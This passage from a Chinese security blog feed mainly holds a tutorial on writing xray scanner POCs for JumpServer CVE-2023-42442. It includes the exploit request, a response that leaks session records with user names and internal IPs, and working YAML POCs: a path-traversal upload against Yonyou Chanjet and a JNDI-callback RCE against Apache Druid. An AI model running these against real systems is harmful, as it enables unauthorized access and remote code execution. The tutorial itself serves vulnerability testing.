id="操作电脑终端"><a href="#操作电脑终端" class="headerlink" title="操作电脑终端"></a>操作电脑终端</h3><p><img src="/2023/11/05/wechatGPT/terminal.jpg" alt="terminal"></p><h3 id="Midjourney画图"><a href="#Midjourney画图" class="headerlink" title="Midjourney画图"></a>Midjourney画图</h3><p><img src="/2023/11/05/wechatGPT/Midjourney.jpg" alt="Midjourney"></p><h3 id="Url-Get"><a href="#Url-Get" class="headerlink" title="Url-Get"></a>Url-Get</h3><p><img src="/2023/11/05/wechatGPT/urlget.jpg" alt="urlget"></p><h3 id="生成摘要"><a href="#生成摘要" class="headerlink" title="生成摘要"></a>生成摘要</h3><p><img src="/2023/11/05/wechatGPT/zhaiyao.jpg" alt="zhaiyao"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>花了一整天时间,成功接入微信。效果还是很不错,可以当作群助手,配置tool插件后提供了更强大了功能。</p><p>比如:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">已加载工具列表: </span><br><span class="line">python, url-get, python, summary, terminal, browser, url-get, wikipedia, arxiv, hello-tool, google-search, wolfram-alpha, debug, answer-user, news-api, finance-news, morning-news, news, bing-search, searxng-search, meteo-weather, morning-news, wikipedia, meteo-weather, terminal</span><br></pre></td></tr></table></figure><p>需要服务器资源,GPT API资源,以及linkai资源以接入Midjourney.使用人数多的话,也是一笔不小的支出。</p><h2 id="参考-1"><a href="#参考-1" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.wangpc.cc/aigc/wechat_com-chatgpt/">https://www.wangpc.cc/aigc/wechat_com-chatgpt/</a></p><p><a href="https://www.zsanjin.de/posts-gpt4api.html">https://www.zsanjin.de/posts-gpt4api.html</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
<tag> ChatGPT </tag>
</tags>
</entry>
<entry>
<title>xray之以CVE-2023-42442为例POC编写</title>
<link href="/2023/09/23/xray/"/>
<url>/2023/09/23/xray/</url>
<content type="html"><![CDATA[<h1 id="xray下载"><a href="#xray下载" class="headerlink" title="xray下载"></a>xray下载</h1><p>社区版下载和使用</p><p>注意下载新版的,旧版可能无法加载自定义POC</p><p><a href="https://github.com/chaitin/xray/releases">https://github.com/chaitin/xray/releases</a></p><h1 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h1><p>查看help</p><p><code>xray_windows_amd64.exe webscan --help</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">NAME:</span><br><span class="line"> xray - A powerful scanner engine [https://docs.xray.cool]</span><br><span class="line"></span><br><span class="line">USAGE:</span><br><span class="line"> [global options] command [command options] [arguments...]</span><br><span class="line"></span><br><span class="line">COMMANDS:</span><br><span class="line"> webscan, ws Run a webscan task</span><br><span class="line"> servicescan, ss Run a service scan task</span><br><span class="line"> subdomain, sd Run a subdomain task</span><br><span class="line"> poclint, pl, lint lint yaml poc</span><br><span class="line"> burp-gamma, btg Convert the export file of burp historical proxy records to POC format</span><br><span class="line"> transform transform other script to gamma</span><br><span class="line"> reverse Run a standalone reverse server</span><br><span class="line"> convert convert results from json to html or from html to json</span><br><span class="line"> genca GenerateToFile CA certificate and key</span><br><span class="line"> upgrade check new version and upgrade self if any updates found</span><br><span class="line"> version Show version info</span><br><span class="line"> x A command that enables all plugins.</span><br><span class="line">You can customize new commands or modify the plugins enabled by a command in the configuration file.</span><br><span class="line"> help, h Shows a list of commands or help for one command</span><br><span class="line"></span><br><span class="line">GLOBAL OPTIONS:</span><br><span class="line"> --config FILE Load configuration from FILE (default: "config.yaml")</span><br><span class="line"> --log-level value Log level, choices are debug, info, warn, error, fatal</span><br><span class="line"> --help, -h show help</span><br><span class="line">[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml</span><br></pre></td></tr></table></figure><p>查看webscan使用</p><p><code>xray_windows_amd64.exe webscan --help</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">NAME:</span><br><span class="line"> webscan - Run a webscan task</span><br><span class="line"></span><br><span class="line">USAGE:</span><br><span class="line"> webscan [command options] [arguments...]</span><br><span class="line"></span><br><span class="line">OPTIONS:</span><br><span class="line"> --list, -l list plugins</span><br><span class="line"> --plugins value, --plugin value, --plug value specify the plugins to run, separated by ','</span><br><span class="line"> --poc value, -p value specify the poc to run, separated by ','</span><br><span class="line"> --level value specify the level of poc to run, separated by ','</span><br><span class="line"> --tags value specify the level of poc to run, separated by ','</span><br><span class="line"></span><br><span class="line"> --listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)</span><br><span class="line"> --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests</span><br><span class="line"> --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests</span><br><span class="line"> --url-file value, --uf value read urls from a local file and scan these urls, one url per line</span><br><span class="line"> --burp-file value, --bf value read requests from burpsuite exported file as targets</span><br><span class="line"> --url value, -u value scan a **single** url</span><br><span class="line"> --data value, -d value data string to be sent through POST (e.g. 'username=admin')</span><br><span class="line"> --raw-request FILE, --rr FILE load http raw request from a FILE</span><br><span class="line"> --force-ssl, --fs force usage of SSL/HTTPS for raw-request</span><br><span class="line"></span><br><span class="line"> --json-output FILE, --jo FILE output xray results to FILE in json format</span><br><span class="line"> --html-output FILE, --ho FILE output xray result to FILE in HTML format</span><br><span class="line"> --webhook-output value, --wo value post xray result to url in json format</span><br></pre></td></tr></table></figure><h1 id="CVE-2023-42442漏洞复现"><a href="#CVE-2023-42442漏洞复现" class="headerlink" title="CVE-2023-42442漏洞复现"></a>CVE-2023-42442漏洞复现</h1><p>参考:<a href="https://blog.csdn.net/holyxp/article/details/133066481">https://blog.csdn.net/holyxp/article/details/133066481</a></p><p><a href="https://www.secrss.com/articles/58981">https://www.secrss.com/articles/58981</a></p><p>burp发送请求包:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1</span><br><span class="line">Host: example.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure><p>查看response</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Server: nginx</span><br><span class="line">Date: Thu, 21 Sep 2023 08:05:28 GMT</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 1782</span><br><span class="line">Connection: close</span><br><span class="line">Vary: Accept, Accept-Language, Cookie</span><br><span class="line">Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS</span><br><span class="line">X-Frame-Options: DENY</span><br><span class="line">Content-Language: en</span><br><span class="line">X-Content-Type-Options: nosniff</span><br><span class="line">Referrer-Policy: same-origin</span><br><span class="line">Set-Cookie: SESSION_COOKIE_NAME_PREFIX=jms_; Path=/</span><br><span class="line"></span><br><span class="line">{"count":18168,"next":"http://example.com/api/v1/terminal/sessions/?limit=2&offset=2","previous":null,"results":[{"id":"4d2f4dfc-8332-46e1-a691-fe5dbe72fc63","user":"林([email protected])","asset":"林(10.15.168.113)","user_id":"70932e0f-5e36-4086-821a-ee453d01f39f","asset_id":"bac40e7c-27d9-4040-b4ad-b692576ac0c9","account":"@INPUT(ltc)","account_id":"4172edfc-4c65-43af-844d-ad729c98babd","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.4.215","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:04:36 +0800","date_end":null},{"id":"95f80041-4bda-45e5-a513-f4bc55385587","user":"郭([email protected])","asset":"郭(10.18.100.100)","user_id":"74b08df7-cadc-4e9b-a1b7-1dd6a53f0314","asset_id":"6dd5488f-bd7a-4731-817f-85217416a52c","account":"@INPUT(GW)","account_id":"98ab7554-e018-4f3d-b936-c1c9a37b62ab","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.129.206","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:03:41 +0800","date_end":null}]}</span><br></pre></td></tr></table></figure><h1 id="自定义POC演示"><a href="#自定义POC演示" class="headerlink" title="自定义POC演示"></a>自定义POC演示</h1><p>使用方法,运行单个自定义POC,命令如下:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml --url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json</span><br></pre></td></tr></table></figure><p>这是一个JumpServer未授权访问漏洞(CVE-2023-42442)。POC如下:</p><p>原理很简单,这段代码描述了对服务器响应的检查条件。它要求响应的状态码为200,并且响应体中包含特定的字符串:”count”、”next”、”previous”和”results”。这些条件共同判断了漏洞利用的成功条件。</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-jumpserver-session-replay-unauth</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">GET</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/api/v1/terminal/sessions/?limit=1</span></span><br><span class="line"> <span class="attr">follow_redirects:</span> <span class="literal">false</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">>-</span></span><br><span class="line"><span class="string"> response.status == 200 && </span></span><br><span class="line"><span class="string"> response.body_string.contains('"count":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"next":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"previous":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"results":')</span></span><br><span class="line"><span class="string"></span><span class="attr">expression:</span> <span class="string">r0()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">Chaitin</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">https://stack.chaitin.com/techblog/detail/156</span></span><br></pre></td></tr></table></figure><p>执行过程:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">____ ___.________. ____. _____.___.</span><br><span class="line">\ \/ /\_ __ \ / _ \ \__ | |</span><br><span class="line"> \ / | _ _/ / /_\ \ / | |</span><br><span class="line"> / \ | | \/ | \ \____ |</span><br><span class="line">\___/\ \ |____| /\____|_ / / _____/</span><br><span class="line"> \_/ \_/ \_/ \/</span><br><span class="line"></span><br><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml</span><br><span class="line"></span><br><span class="line">Enabled plugins: [phantasm]</span><br><span class="line"></span><br><span class="line">[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml</span><br><span class="line">[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)</span><br><span class="line">[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/</span><br><span class="line">[Vuln: phantasm]</span><br><span class="line">Target "http://example.com/"</span><br><span class="line">VulnType "poc-yaml-jumpserver-session-replay-unauth/default"</span><br><span class="line">Author "Chaitin"</span><br><span class="line">Links ["https://stack.chaitin.com/techblog/detail/156"]</span><br><span class="line"></span><br><span class="line">[*] All pending requests have been scanned</span><br><span class="line">[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%</span><br><span class="line">[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done</span><br></pre></td></tr></table></figure><p>最后,打开html报告查看漏洞详情即可。</p><h1 id="POC编写指南"><a href="#POC编写指南" class="headerlink" title="POC编写指南"></a>POC编写指南</h1><p>如何编写高质量POC:<a href="https://docs.xray.cool/#/guide/hiq/summary">https://docs.xray.cool/#/guide/hiq/summary</a></p><p>规则实验室:<a href="https://poc.xray.cool/">https://poc.xray.cool/</a></p><p>可以通过该工具便捷的生成POC,同时可以使用该工具对POC进行格式检查与查重</p><p>具体可以查看开发者文档:<a href="https://docs.xray.cool/#/guide/README">https://docs.xray.cool/#/guide/README</a></p><ul><li>插件的基本构成:<a href="https://docs.xray.cool/#/guide/yaml/yaml_script_v2">https://docs.xray.cool/#/guide/yaml/yaml_script_v2</a></li><li>插件运行逻辑:<a href="https://docs.xray.cool/#/guide/yaml/yaml_run_logic">https://docs.xray.cool/#/guide/yaml/yaml_run_logic</a></li><li>POC编写模板:<a href="https://docs.xray.cool/#/guide/yaml/yaml_poc_template">https://docs.xray.cool/#/guide/yaml/yaml_poc_template</a></li></ul><p>社区贡献的POC:<a href="https://github.com/chaitin/xray/tree/master/pocs">https://github.com/chaitin/xray/tree/master/pocs</a></p><p>POC示例:</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-yonyou-chanjet-file-updoad</span></span><br><span class="line"><span class="attr">manual:</span> <span class="literal">true</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">set:</span></span><br><span class="line"> <span class="attr">randstr:</span> <span class="string">randomLowercase(60)</span></span><br><span class="line"> <span class="attr">rboundary:</span> <span class="string">randomLowercase(8)</span></span><br><span class="line"> <span class="attr">randname:</span> <span class="string">randomLowercase(6)</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">cache:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">POST</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/tplus/SM/SetupAccount/Upload.aspx?preload=1</span></span><br><span class="line"> <span class="attr">headers:</span></span><br><span class="line"> <span class="attr">Content-Type:</span> <span class="string">multipart/form-data;</span> <span class="string">boundary=----WebKitFormBoundary{{rboundary}}</span></span><br><span class="line"> <span class="attr">body:</span> <span class="string">"\</span></span><br><span class="line"><span class="string"> ------WebKitFormBoundary<span class="template-variable">{{rboundary}}</span>\r\n\</span></span><br><span class="line"><span class="string"> Content-Disposition: form-data; name=\"File1\"; filename=\"../../../img/login/<span class="template-variable">{{randname}}</span>.jpg\"\r\n\</span></span><br><span class="line"><span class="string"> Content-Type: image/jpeg\r\n\</span></span><br><span class="line"><span class="string"> \r\n\</span></span><br><span class="line"><span class="string"> <span class="template-variable">{{randstr}}</span>\r\n\</span></span><br><span class="line"><span class="string"> ------WebKitFormBoundary<span class="template-variable">{{rboundary}}</span>--\</span></span><br><span class="line"><span class="string"> "</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">response.status</span> <span class="string">==</span> <span class="number">200</span></span><br><span class="line"> <span class="attr">r1:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">cache:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">GET</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/tplus/img/login/{{randname}}.jpg</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">response.status</span> <span class="string">==</span> <span class="number">200</span> <span class="string">&&</span> <span class="string">response.body.bcontains(bytes(randstr))</span></span><br><span class="line"><span class="attr">expression:</span> <span class="string">r0()</span> <span class="string">&&</span> <span class="string">r1()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">Jarcis-cy</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1</span></span><br><span class="line"> <span class="attr">vulnerability:</span></span><br><span class="line"> <span class="attr">id:</span> <span class="string">CT-475791</span></span><br><span class="line"> <span class="attr">level:</span> <span class="string">critical</span></span><br></pre></td></tr></table></figure><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-apache-druid-kafka-rce</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">set:</span></span><br><span class="line"> <span class="attr">reverse:</span> <span class="string">newReverse()</span></span><br><span class="line"> <span class="attr">reverseRMI:</span> <span class="string">reverse.rmi</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">POST</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/druid/indexer/v1/sampler?for=connect</span></span><br><span class="line"> <span class="attr">follow_redirects:</span> <span class="literal">false</span></span><br><span class="line"> <span class="attr">headers:</span></span><br><span class="line"> <span class="attr">Content-Type:</span> <span class="string">application/json</span></span><br><span class="line"> <span class="attr">body:</span> <span class="string">|-</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span class="string"> "spec":{</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span class="string"> "ioConfig":{</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span class="string"> "consumerProperties":{</span></span><br><span class="line"><span class="string"> "bootstrap.servers":"6.6.6.6:9092",</span></span><br><span class="line"><span class="string"> "sasl.mechanism":"SCRAM-SHA-256",</span></span><br><span class="line"><span class="string"> "security.protocol":"SASL_SSL",</span></span><br><span class="line"><span class="string"> "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "topic":"any",</span></span><br><span class="line"><span class="string"> "useEarliestOffset":true,</span></span><br><span class="line"><span class="string"> "inputFormat":{</span></span><br><span class="line"><span class="string"> "type":"regex",</span></span><br><span class="line"><span class="string"> "pattern":"([\\s\\S]*)",</span></span><br><span class="line"><span class="string"> "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",</span></span><br><span class="line"><span class="string"> "columns":[</span></span><br><span class="line"><span class="string"> "raw"</span></span><br><span class="line"><span class="string"> ]</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "dataSchema":{</span></span><br><span class="line"><span class="string"> "dataSource":"sample",</span></span><br><span class="line"><span class="string"> "timestampSpec":{</span></span><br><span class="line"><span class="string"> "column":"!!!_no_such_column_!!!",</span></span><br><span class="line"><span class="string"> "missingValue":"1970-01-01T00:00:00Z"</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "dimensionsSpec":{</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"granularitySpec"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"rollup"</span><span class="string">:false</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"tuningConfig"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"type"</span><span class="string">:"kafka"</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"samplerConfig"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"numRows"</span><span class="string">:500,</span></span><br><span class="line"> <span class="string">"timeoutMs"</span><span class="string">:15000</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">reverse.wait(5)</span></span><br><span class="line"><span class="attr">expression:</span> <span class="string">r0()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">chaitin</span></span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> 漏洞 </category>
</categories>
<tags>
<tag> 安全 </tag>
<tag> 漏洞 </tag>
</tags>
</entry>
<entry>
<title>WAF</title>
<link href="/2023/06/23/waf/"/>
<url>/2023/06/23/waf/</url>
<content type="html"><![CDATA[<h1 id="WAF概念介绍"><a href="#WAF概念介绍" class="headerlink" title="WAF概念介绍"></a>WAF概念介绍</h1><h2 id="WAF概念"><a href="#WAF概念" class="headerlink" title="WAF概念"></a>WAF概念</h2><h2 id="WAF的产品形态"><a href="#WAF的产品形态" class="headerlink" title="WAF的产品形态"></a>WAF的产品形态</h2><h2 id="WAF部署模式"><a href="#WAF部署模式" class="headerlink" title="WAF部署模式"></a>WAF部署模式</h2><h1 id="开源WAF"><a href="#开源WAF" class="headerlink" title="开源WAF"></a>开源WAF</h1>]]></content>
<categories>
<category> 安全 </category>
</categories>
<tags>
<tag> 安全 </tag>
<tag> WAF </tag>
</tags>
</entry>
<entry>
<title>Firefox安装证书的几种方式</title>
<link href="/2023/06/07/firefox-and-bat/"/>
<url>/2023/06/07/firefox-and-bat/</url>
<content type="html"><![CDATA[<h1 id="Firefox安装证书的几种方式"><a href="#Firefox安装证书的几种方式" class="headerlink" title="Firefox安装证书的几种方式"></a>Firefox安装证书的几种方式</h1><p>Firefox安装证书的几种方式。</p><h2 id="关于bat脚本"><a href="#关于bat脚本" class="headerlink" title="关于bat脚本"></a>关于bat脚本</h2><h3 id="bat脚本中的变量类型"><a href="#bat脚本中的变量类型" class="headerlink" title="bat脚本中的变量类型"></a>bat脚本中的变量类型</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">set regPath=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion</span><br><span class="line">set regKey=ProgramFilesDir</span><br><span class="line">set regValue= </span><br><span class="line">set Value1="ww"</span><br><span class="line"></span><br><span class="line">reg query %regPath% >nul 2>nul</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo Registry key %regPath% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> echo %%b</span><br><span class="line"> echo !Value1! 1</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Registry key %regPath% does not exist.</span><br><span 